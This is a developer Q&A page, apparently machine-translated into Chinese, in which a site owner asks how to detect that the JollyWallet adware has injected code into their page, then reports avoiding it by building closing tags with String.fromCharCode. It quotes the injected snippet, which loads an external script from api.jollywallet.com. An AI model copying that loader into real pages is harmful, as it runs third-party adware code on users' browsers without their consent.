识别是否发生了代码注入(JollyWallet等)
Identifying if code injection occurred (JollyWallet, etc)
我们希望提醒用户,如果代码注入已经发生,而页面正在加载。我们遇到了JollyWallet注入代码并导致SCRIPT块保持打开状态的问题。当然,我们的代码在那个SCRIPT块中。
这是我们在原始
中的内容sTrailer = "</body></html>" //Used to close popup print view window
下面是被注入的代码:
sTrailer = "<script type="text/javascript">(function () {if (top.location == self.location && top.location.href.split('#')[0] == 'https://www.xxxxxxx.net/xxx/xxx/<filename>.asp?account=###############') {var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;po.src = 'https://api.jollywallet.com/affiliate/client?dist=213&sub=bsg-rt-revenyou&name=BrowserSafeguard';var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);}})();</script></body></html>"
最理想的情况是,当用户登录我们的网站时,我们希望提醒他们这个PUP的存在。我们还可以选择停止受影响页面上的注入。
有人知道可以在页面加载结束时运行的测试,以识别代码注入吗?
对不起,我忘了发布修复这个。我结束了从charCode中编写元素,因为恶意软件正在寻找特定的文本。
winPrintView.document.write(String.fromCharCode(60, 47, 98, 111, 100, 121, 62, 60, 47, 104, 116, 109, 108, 62));
相关文章:
- 使用Objective-C的JavaScript注入方法
- 正在注入包含JS的HTML
- 迷你$provider注入茉莉花和角
- Angularjs工厂注入错误
- 通过命令行/批处理文件打开页面时,将javascript代码注入Google Chrome
- 如何在Ionic Android中将Javascript注入到web视图中
- Android Webview通过Javascript注入CSS
- Meteor:在启动时将html注入客户端文件
- 注入工厂时,Angular停止工作
- 注入Javascript以选择具有指定值的所有单选按钮
- XSS通过地址栏注入
- 注入angularjs指令
- Ember服务在注入组件并在计算属性中使用后是未定义的
- AngularJS依赖注入定时问题
- 如何通过铬扩展注入反应元素
- 如何防止在客户端/服务器两侧对文本框进行sql注入
- Ionic将firebase注入工厂,同时将控制器和服务保存在不同的文件中
- 如何在单元测试中将存储注入Ember.Service
- 注入的HTML仅在Dom中解释为字符串
- 识别是否发生了代码注入(JollyWallet等)